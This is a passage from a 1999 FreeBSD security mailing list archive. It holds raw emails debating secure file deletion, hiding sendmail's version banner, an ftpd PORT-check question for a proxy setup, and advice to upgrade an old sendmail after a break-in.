Received: from 001101.zer0.org (001101.zer0.org [206.24.105.163]) by hub.freebsd.org (Postfix) with ESMTP id 6BF7014D82 for ; Thu, 20 May 1999 02:35:56 -0700 (PDT) (envelope-from gsutter@001101.zer0.org) Received: (from gsutter@localhost) by 001101.zer0.org (8.9.2/8.9.2) id CAA46763; Thu, 20 May 1999 02:34:16 -0700 (PDT) (envelope-from gsutter) Date: Thu, 20 May 1999 02:34:16 -0700 From: Gregory Sutter To: Darren Reed Cc: Wes Peters , imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion Message-ID: <19990520023416.A46301@001101.zer0.org> References: <37438E4C.4B95B937@softweyr.com> <199905200642.QAA11368@avalon.reed.wattle.id.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199905200642.QAA11368@avalon.reed.wattle.id.au>; from Darren Reed on Thu, May 20, 1999 at 04:42:18PM +1000 Organization: Zer0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, May 20, 1999 at 04:42:18PM +1000, Darren Reed wrote: > In some email I received from Wes Peters, sie wrote: > > Warner Losh wrote: > > > > > > Does it doe the DoD recommended patter of deletion? That is overwrite > > > > The standard used to be 100 overwrites of 0xe5 then 0x5e, but they > > changed the standard just as I was leaving the defense industry in > > 1991. Does Posix or SUS have anything to say about this? > > I'd worry about this sort of thing when and if FreeBSD is ever used for > storing of (officially) classified/confidential material and even then, > the solution is likely to be to take a hammer or drill to the disks. If someone is going to be coding this, it would be better to code it correctly the first time than have to add it later. It seems easy enough to add--after the first bit compare, should that be enabled, have a second for 'quick' or 'secure' zeroing. > Lets try being a little realistic, eh ? Thorough != unrealistic. Greg -- Gregory S. Sutter Failing sardine factory cans employees! mailto:gsutter@pobox.com http://www.pobox.com/~gsutter/ PGP DSS public key 0x40AE3052 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 3:13:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from firewall.reed.wattle.id.au (darren2.lnk.telstra.net [139.130.53.33]) by hub.freebsd.org (Postfix) with ESMTP id 5ADFA14F52 for ; Thu, 20 May 1999 03:13:46 -0700 (PDT) (envelope-from darrenr@reed.wattle.id.au) Received: (from root@localhost) by firewall.reed.wattle.id.au (8.9.1/8.8.7) id KAA20818; Thu, 20 May 1999 10:13:45 GMT Received: from avalon.reed.wattle.id.au(192.168.1.1) by firewall.reed.wattle.id.au via smap (V1.3) id sma020816; Thu May 20 10:13:33 1999 Received: from percival.reed.wattle.id.au. (percival.reed.wattle.id.au [192.168.1.5]) by avalon.reed.wattle.id.au (8.9.0.Beta3/8.9.0.Beta3) with SMTP id UAA12994; Thu, 20 May 1999 20:13:31 +1000 (EST) From: Darren Reed Message-Id: <199905201013.UAA12994@avalon.reed.wattle.id.au> Subject: Re: secure deletion In-Reply-To: <19990520023416.A46301@001101.zer0.org> from Gregory Sutter at "May 20, 99 02:34:16 am" To: gsutter@pobox.com (Gregory Sutter) Date: Thu, 20 May 1999 20:13:31 +1000 (EST) Cc: darrenr@reed.wattle.id.au, wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL37 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some email I received from Gregory Sutter, sie wrote: > On Thu, May 20, 1999 at 04:42:18PM +1000, Darren Reed wrote: > > In some email I received from Wes Peters, sie wrote: > > > Warner Losh wrote: > > > > > > > > Does it doe the DoD recommended patter of deletion? That is overwrite > > > > > > The standard used to be 100 overwrites of 0xe5 then 0x5e, but they > > > changed the standard just as I was leaving the defense industry in > > > 1991. Does Posix or SUS have anything to say about this? > > > > I'd worry about this sort of thing when and if FreeBSD is ever used for > > storing of (officially) classified/confidential material and even then, > > the solution is likely to be to take a hammer or drill to the disks. > > If someone is going to be coding this, it would be better to code it > correctly the first time than have to add it later. It seems easy > enough to add--after the first bit compare, should that be enabled, > have a second for 'quick' or 'secure' zeroing. So properly in this case means using memset rather than bzero and a variable number of passes, correct (with perhaps a programmable pattern) ? Being able to verify that the file's contents get nuked to the value the pass is meant to have set it to might be worthwhile. After the first pass, I'm not sure that there is any meaningful addition to the security of the erased data. Access to sophisticated machinery is required to circumvent it, but if that is what you're trying to protect against then why fool yourself by deploying a level of security that is known to be less than Government bodies who physically destroying disks. I don't think you understand the problem properly if you think it can be coded "correctly" - what you're proposing just isn't possible via software where one overwrite is pretty much as good as multiple. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 6:10: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.ru (sentry.granch.ru [212.20.5.135]) by hub.freebsd.org (Postfix) with ESMTP id 15B8114C41 for ; Thu, 20 May 1999 06:09:36 -0700 (PDT) (envelope-from shelton@sentry.granch.ru) Received: from sentry.granch.ru (1001@localhost.granch.ru [127.0.0.1]) by sentry.granch.ru (8.9.3/8.9.3) with ESMTP id UAA06541 for ; Thu, 20 May 1999 20:10:28 +0700 (NSS) Message-ID: <374409C2.D1E63188@sentry.granch.ru> Date: Thu, 20 May 1999 20:10:26 +0700 From: "Rashid N. Achilov" Organization: Granch Ltd. X-Mailer: Mozilla 4.6 [en] (X11; I; FreeBSD 2.2.8-RELEASE i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Sendmail HELP confuse me Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What can I delete version number from message, displayed by HELP command in telnet session at sendmail port? Greeting may customize in sendmail.cf, but I cannot found HELP and in sendmail.hf too. -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Granch Ltd. lead engineer e-mail: achilov@granch.ru, tel (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 6:20:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.tepucom.nl (mail.tepucom.nl [195.81.12.5]) by hub.freebsd.org (Postfix) with ESMTP id DAC5F14CFE for ; Thu, 20 May 1999 06:20:50 -0700 (PDT) (envelope-from theo@tepucom.nl) Received: from kantoor-1.tepucom.nl (localhost [127.0.0.1]) by mail.tepucom.nl (8.8.5/SCO5) with SMTP id PAA13181; Thu, 20 May 1999 15:19:50 +0200 (CETDST) Received: by kantoor-1.tepucom.nl with Microsoft Mail id <01BEA2C7.E8FDEEA0@kantoor-1.tepucom.nl>; Thu, 20 May 1999 13:51:50 +-200 Message-ID: <01BEA2C7.E8FDEEA0@kantoor-1.tepucom.nl> From: "Theo Purmer (Tepucom)" To: "'Rashid N. Achilov'" Cc: "'freebsd-security@FreeBSD.ORG'" Subject: Re: Sendmail HELP confuse me Date: Thu, 20 May 1999 13:51:49 +-200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org the version number is represented by $v in sendmail.cf the initial login message is preceded with De in sendmail.cf the help messages are normally in the sendmail.hf file cheers theo purmer tepucom the netherlands What can I delete version number from message, displayed by HELP command in telnet session at sendmail port? Greeting may customize in sendmail.cf, but I cannot found HELP and in sendmail.hf too. -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Granch Ltd. lead engineer e-mail: achilov@granch.ru, tel (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 7:58: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from server.mindstep.com (cr480472-a.slnt1.on.wave.home.com [24.112.33.138]) by hub.freebsd.org (Postfix) with SMTP id B5E31150AF for ; Thu, 20 May 1999 07:57:55 -0700 (PDT) (envelope-from patrick@mindstep.com) Received: (qmail 12090 invoked from network); 20 May 1999 14:57:55 -0000 Received: from pm6100.local.mindstep.com (HELO ?192.168.55.3?) (192.168.55.3) by local.mindstep.com with SMTP; 20 May 1999 14:57:55 -0000 X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410) Date: Thu, 20 May 1999 10:57:52 -0400 Subject: Re: secure deletion From: "Patrick Bihan-Faou" To: Darren Reed , Gregory Sutter Cc: darrenr@reed.wattle.id.au, wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Mime-version: 1.0 X-Priority: 3 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Message-Id: <19990520145800.B5E31150AF@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some email I received, Darren Reed wrote: > I don't think you understand the problem properly if you think it can be > coded "correctly" - what you're proposing just isn't possible via software > where one overwrite is pretty much as good as multiple. I agree with that last statement. An implementation on FreeBSD probably does not need to write multiple times to the disk. The added security in that case will not matter. What I think is the issue is how much security people are seeking. You can see several levels: - none: files are deleted the way they are now, and it is fine. The mechanism provided by FreeBSD when reallocating the disk blocks are good enough to ensure the level of confidentiality we are looking after. - basic: what the original poster was suggesting: writing garbage data (be it zero or some pattern) over the deleted chunks. The clear advantage of that is that if you try to recover the freed blocks on a system comparable to the original system, you will probably not get anything useful out of the disk. - thorough: what government agencies do: physically destroy the disk. But this is not really practical when you just intend to erase a single file... In defense of the "basic" mechanism, I can see people getting worried that by just running some program on a disk people can recover data that they would wish gone for good. I am not talking about an organization that could use all the funky hardware that would be required to fin the remanence of the magnetic trace left by the data that was on the disk 20 writes ago, but just somebody pulling the disk into another system on running recovery programs. I don't think the original poster was considering applications with very tight security requirements (like the government may have in some cases). But more protection against "casual" hackers (if a such thing exists). Just my 2 cents, Have a nice day. Patrick. -- Et les Shadoks pompaient... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 8:53:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from india.wind-river.com (india.wind-river.com [12.10.173.8]) by hub.freebsd.org (Postfix) with ESMTP id A77FA14D04 for ; Thu, 20 May 1999 08:53:38 -0700 (PDT) (envelope-from jmaslak@wind-river.com) Received: from junk (jerico-sv-12.wind-river.com [12.10.173.1]) by india.wind-river.com (8.9.3/8.9.3) with SMTP id KAA19259 for ; Thu, 20 May 1999 10:02:08 -0600 Message-Id: <3.0.6.32.19990520095507.00840010@india.wind-river.com> X-Sender: jmaslak@india.wind-river.com X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32) Date: Thu, 20 May 1999 09:55:07 -0600 To: security@freebsd.org From: Joel Maslak Subject: Secure Deletion Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Let's keep standard BSD semantics here, please! As for "secure" deletion... Why doesn't someone just write a simple user-space program to do that. True, it wouldn't handle calls to unlink(), but one would think that someone could modify the library really quick (provided no one does a system call directly, but uses the libc interface instead). I think this would be much better for everyone involved. Some problems with my idea... Static-linked executables would need to be recompiled Library would need to be modified on "secure" systems If all you want is a way to force a file to go away from the command line, just rewrite rm. Joel Maslak UPDATE -- Generate Web Traffic http://www.permission-marketing.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 8:59:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id 287E114D04 for ; Thu, 20 May 1999 08:58:15 -0700 (PDT) (envelope-from kiril@idea.co.uk) Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id QAA25977; Thu, 20 May 1999 16:42:26 +0100 (BST) From: Kiril Mitev Message-Id: <199905201542.QAA25977@idea.co.uk> Subject: Re: secure deletion To: patrick@mindstep.com (Patrick Bihan-Faou) Date: Thu, 20 May 1999 16:42:26 +0100 (BST) Cc: darrenr@reed.wattle.id.au, gsutter@pobox.com, wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG In-Reply-To: <19990520145800.B5E31150AF@hub.freebsd.org> from "Patrick Bihan-Faou" at May 20, 99 10:57:52 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > In some email I received, Darren Reed wrote: > > > I don't think you understand the problem properly if you think it can be > > coded "correctly" - what you're proposing just isn't possible via software > > where one overwrite is pretty much as good as multiple. > > I agree with that last statement. An implementation on FreeBSD probably does > not need to write multiple times to the disk. The added security in that > case will not matter. What I think is the issue is how much security people > are seeking. You can see several levels: > > - none: files are deleted the way they are now, and it is fine. The > mechanism provided by FreeBSD when reallocating the disk blocks are good > enough to ensure the level of confidentiality we are looking after. > > - basic: what the original poster was suggesting: writing garbage data (be > it zero or some pattern) over the deleted chunks. The clear advantage of > that is that if you try to recover the freed blocks on a system comparable > to the original system, you will probably not get anything useful out of the > disk. > > - thorough: what government agencies do: physically destroy the disk. But > this is not really practical when you just intend to erase a single file... > > In defense of the "basic" mechanism, I can see people getting worried that > by just running some program on a disk people can recover data that they > would wish gone for good. I am not talking about an organization that could > use all the funky hardware that would be required to fin the remanence of > the magnetic trace left by the data that was on the disk 20 writes ago, but > just somebody pulling the disk into another system on running recovery > programs. > > I don't think the original poster was considering applications with very > tight security requirements (like the government may have in some cases). > But more protection against "casual" hackers (if a such thing exists). well, not to split hairs, but if you (1) ARE worried about your disk being put into another machine to be read by recovery tools, -> then, you are probably worried about physical access to hardware -> then you (theoretically) should be worried about locking up your hardware, rather than wiping your disk :-0 ==== (1) you the generic user, not you Patrick > Just my 2 cents, > > > Have a nice day. > > > Patrick. > > -- > Et les Shadoks pompaient... > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 10:49:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id 8F6BB15238 for ; Thu, 20 May 1999 10:49:35 -0700 (PDT) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (1553 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 20 May 1999 12:31:08 -0500 (CDT) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Thu, 20 May 1999 12:31:06 -0500 (CDT) From: James Wyatt To: "Ilmar S. Habibulin" Cc: posix1e@cyrus.watson.org, freebsd-security@freebsd.org Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 19 May 1999, Ilmar S. Habibulin wrote: > May be it's an freebsd-fs@ question, but i think that it belings here to. > I heard that some linux fs (maybe extfs2?) have some secure deletion flag, > which being set on inode(file or dir) cause content of this file to be > wiped before deletion, so even if somebody manage to restore file, its > content would be unusable. I think, that it is nice feature, and i would > like to see it in freebsd. What would you say? My first thought was, what a great idea for /etc/master.passwd which gets flushed every time a user updates their password. Good idea for any file containing decrypted data. My second thought of the impact of support for wiping in the kernel... If I really wanted to slow down a server I didn't like, setting this flag for files in /tmp and CGI-interim results piping and caching sounds like it could quietly drive disk IO up quite a bit. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 11: 4:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from mongoose.slip.net (mongoose.slip.net [207.171.193.14]) by hub.freebsd.org (Postfix) with ESMTP id A584C15238 for ; Thu, 20 May 1999 11:04:48 -0700 (PDT) (envelope-from admin@addr.net) Received: from [209.152.191.146] (helo=comp3.addr.com) by mongoose.slip.net with esmtp (Exim 2.12 #4) id 10kXBV-000416-00 for freebsd-security@freebsd.org; Thu, 20 May 1999 11:04:45 -0700 Message-Id: <4.2.0.37.19990520104919.02a14ee0@mail.addr.com> X-Sender: addr@mail.addr.com (Unverified) X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Thu, 20 May 1999 11:04:24 -0700 To: freebsd-security@freebsd.org From: "Addr.com Web Hosting" Subject: question about ftpd sercurity feature. Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I have a question regarding a security feature which is build in to the "ftpd" on the FreeBSD system. The feature is that the server will not accept any "PORT" command unless the address matches that of the client. The reason this is a problem is because I am partially proxy-ing the connection, and the client address is that of the proxy, but I don't want the proxy to handle data connections, just have them made directly to the client. In more detail (and I would appreciate any comments/suggestions about this scheme or any alternate scheme you can recommend): We have users distributed among several machines, however, we would like for the users to be able to access their account via a single FTP server. We currently using NFS, however, under heavier loads it becomes unmanageable and unstable. Instead, I have developed a very simple proxy, which queries for the user name and then based on an internal table makes the connection to the correct server, and simply pipes any data from the server to the client, and vice versa. This is were I hit the problem that the server will not establish a data connection to any machine other then the proxy. Of course I can proxy the data connection as well, but if it doesn't cause any security issues, I would much rather just comment that line out of the ftpd server. Thanks in advance, Anthony To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 12:41: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id C5D871567A for ; Thu, 20 May 1999 12:40:50 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id XAA04540; Thu, 20 May 1999 23:40:48 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id XAA02549; Thu, 20 May 1999 23:40:42 +0400 (MSD) Date: Thu, 20 May 1999 23:40:42 +0400 (MSD) From: "Ilmar S. Habibulin" To: James Wyatt Cc: posix1e@cyrus.watson.org, freebsd-security@freebsd.org Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 20 May 1999, James Wyatt wrote: > My first thought was, what a great idea for /etc/master.passwd which gets > flushed every time a user updates their password. Good idea for any file > containing decrypted data. > > My second thought of the impact of support for wiping in the kernel... If > I really wanted to slow down a server I didn't like, setting this flag for > files in /tmp and CGI-interim results piping and caching sounds like it > could quietly drive disk IO up quite a bit. - Jy@ My thoughts are about an option in kernel config file (WIPEINFO?), which will enable wiping support. To wipe the file before deletion you should set some wipe flag on this file. And i suppose that flag could be set only at the apps' wheel. ;-) I don't see any inheritance mechanism for this flag. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 12:45: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from tsunami.x5ca.net (tsunami.x5ca.net [206.191.74.2]) by hub.freebsd.org (Postfix) with SMTP id 8499E156B6 for ; Thu, 20 May 1999 12:44:58 -0700 (PDT) (envelope-from alanp@unixpower.org) Received: from unixpower.org (s1m09-dyn.x5ca.net [206.191.74.217]) by tsunami.x5ca.net (950413.SGI.8.6.12/950213.SGI.AUTOCF) via ESMTP id PAA06863 for ; Thu, 20 May 1999 15:46:19 -0400 Message-ID: <3744663D.77280116@unixpower.org> Date: Thu, 20 May 1999 15:45:01 -0400 From: Alan X-Mailer: Mozilla 4.07 [en] (X11; I; FreeBSD 3.2-STABLE i386) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: attack of failure Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 19, 1999 at 11:03:26PM -0500, Andrew G. Russell wrote: > Last night, a system that has been running FreeBSD 2.1.5 for a number of > years with the last upgrade being sendmail 8.8.4 being added. > sendmail 8.8.4 can give crackers root access, plus you are running a *real* old version of FreeBSD that most likely has a bunch of exploitable things. > This system will be upgraded to 2.2.8, but I sure would like some clue as > to how it happened. > > Thanks in advance for any help/thoughts. > > A.G. Russell -- | Alan L. * Webmaster of www.UnixPower.org | | Windsor Unix Users Group Founder: http://unix.windsor.on.ca/ | | Personal Page: http://www.unixpower.org/alanp/ | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 12:52: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from vespucci.advicom.net (vespucci.advicom.net [199.170.120.42]) by hub.freebsd.org (Postfix) with ESMTP id DB11D14F0D for ; Thu, 20 May 1999 12:51:52 -0700 (PDT) (envelope-from avalon@vespucci.advicom.net) Received: from localhost (avalon@localhost) by vespucci.advicom.net (8.8.8/8.8.5) with ESMTP id OAA03968; Thu, 20 May 1999 14:51:40 -0500 (CDT) X-Envelope-Recipient: freebsd-security@FreeBSD.ORG Date: Thu, 20 May 1999 14:51:39 -0500 (CDT) From: Avalon Books To: Dan Langille Cc: Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: <19990520065202.IDMD7869945.mta1-rme@wocker> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I know of at least one government department which drills through the > platters when disposing of a disk drive. We used to be required to "de-commission" hard drives by disassembling them, deguassing the platters and them forcibly removing the media with a belt grinder. Both the platters (or what was left of them) and the (now powdered) media were placed into secure storage (policy said for 10 years minimum). It seems a bit extreme, but I will admit it *is* a secure erase method. That's military thinking for you... --R. Pelletier Sys Admin, House Galiagante We are a Micro$oft-free site To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 13: 5:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from vespucci.advicom.net (vespucci.advicom.net [199.170.120.42]) by hub.freebsd.org (Postfix) with ESMTP id 886A814F0D for ; Thu, 20 May 1999 13:05:29 -0700 (PDT) (envelope-from avalon@vespucci.advicom.net) Received: from localhost (avalon@localhost) by vespucci.advicom.net (8.8.8/8.8.5) with ESMTP id PAA06556; Thu, 20 May 1999 15:05:18 -0500 (CDT) X-Envelope-Recipient: security@FreeBSD.ORG Date: Thu, 20 May 1999 15:05:18 -0500 (CDT) From: Avalon Books To: Joel Maslak Cc: security@FreeBSD.ORG Subject: Re: Secure Deletion In-Reply-To: <3.0.6.32.19990520095507.00840010@india.wind-river.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > As for "secure" deletion... Why doesn't someone just write a simple > user-space program to do that. True, it wouldn't handle calls to unlink(), > but one would think that someone could modify the library really quick > (provided no one does a system call directly, but uses the libc interface > instead). I think this would be much better for everyone involved. Actually, I've done this already. At the moment, its a simple stand-alone program (I originally wrote during my DOS days, years ago), but I've been toying with the idea of adding the method in as an option for 'rm'. No need to tie up the kernel with this sort of thing. It uses a combination of randomly-generated and pattern-specific overwrites of a file (or group of files) in-place, in order to make recovery extremely difficult--even with advanced equipment (like echo-cancellation analysis systems). A standard file-deletion is issued after its done mangling the file(s) in question. It works ok, I guess, as betas go. For course, this does nothing to compensate for all the 'weirdnesses' that hard drive manufacturers implment for the sake of performance. Just the thought of trying to write all that hardware-specific code gives me heartburn. And if somebody gets physical access to a drive before anything gets erased... well... too bad... Anyway, I have the source code if anybody wants to take a peek at it. Its my personal opinion, however, that the whole idea of performing a true security erase on magnetic media is highly problematic, at best. Recovery techniques are extremely sophisticated these days, and just overwriting a file once or twice with random junk doesn't get the job done anymore... --R. Pelletier Sys Admin, House Galiagante We are a Micro$oft-free site To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 13:46:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx01.iafrica.com.na (mx01.iafrica.com.na [196.31.227.173]) by hub.freebsd.org (Postfix) with ESMTP id 34F9915090 for ; Thu, 20 May 1999 13:46:20 -0700 (PDT) (envelope-from tim@iafrica.com.na) Received: from dup102-whk.iafrica.com.na ([196.20.4.205] helo=aptiva) by mx01.iafrica.com.na with smtp (Exim 2.11 #1) id 10kZhT-000GOJ-00; Thu, 20 May 1999 21:45:55 +0100 Message-ID: <374474D4.2263@iafrica.com.na> Date: Thu, 20 May 1999 22:47:16 +0200 From: Tim Priebe Reply-To: tim@iafrica.com.na X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: Joel Maslak Cc: security@freebsd.org Subject: Re: Secure Deletion References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Joel Maslak wrote: > > Let's keep standard BSD semantics here, please! > > As for "secure" deletion... Why doesn't someone just write a simple > user-space program to do that. True, it wouldn't handle calls to unlink(), > but one would think that someone could modify the library really quick > (provided no one does a system call directly, but uses the libc interface > instead). I think this would be much better for everyone involved. > > Some problems with my idea... > > Static-linked executables would need to be recompiled > Library would need to be modified on "secure" systems > > If all you want is a way to force a file to go away from the command line, > just rewrite rm. From my understanding of ffs, this would not be sufficiant. As a file grows, it is possible that the data is copied from its initial location to a new one. To not just give a false sense of security these block fragments would have to be over written after the data is copied, or some of the data could still be sitting on the drive after you think it is gone. Tim. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 14:33:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 5272214C8D for ; Thu, 20 May 1999 14:33:29 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id XAA23462 for freebsd-security@freebsd.org; Thu, 20 May 1999 23:33:26 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id EE24F8837; Thu, 20 May 1999 19:36:21 +0200 (CEST) (envelope-from roberto) Date: Thu, 20 May 1999 19:36:21 +0200 From: Ollivier Robert To: freebsd-security@freebsd.org Subject: Re: Sendmail HELP confuse me Message-ID: <19990520193621.A40838@keltia.freenix.fr> Mail-Followup-To: freebsd-security@freebsd.org References: <374409C2.D1E63188@sentry.granch.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: <374409C2.D1E63188@sentry.granch.ru>; from Rashid N. Achilov on Thu, May 20, 1999 at 08:10:26PM +0700 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5322 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Rashid N. Achilov: > What can I delete version number from message, displayed by HELP command > in telnet session at sendmail port? Greeting may customize in > sendmail.cf, but I cannot found HELP and in sendmail.hf too. Hack the source to mask $v or modify the .hf file. Or use Postfix which has the complete greeting configurable (and default to no version number). IT has no HELP command yet so there is no hole there :-) -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #71: Sun May 9 20:16:32 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 15:44:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from alpha.sea-to-sky.net (sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (Postfix) with ESMTP id C6BAA14E37 for ; Thu, 20 May 1999 15:44:24 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net) Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.9.1a/8.8.7) id PAA01561; Thu, 20 May 1999 15:44:42 -0700 Date: Thu, 20 May 1999 15:44:42 -0700 (PDT) From: Steve Reid To: freebsd-security@freebsd.org Subject: re: secure deletion Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Regarding the secure deletion thread... Rm in FreeBSD (*BSD, I think) already has a -P option to overwrite files. "man 1 rm" for more info. If you want to overwrite the 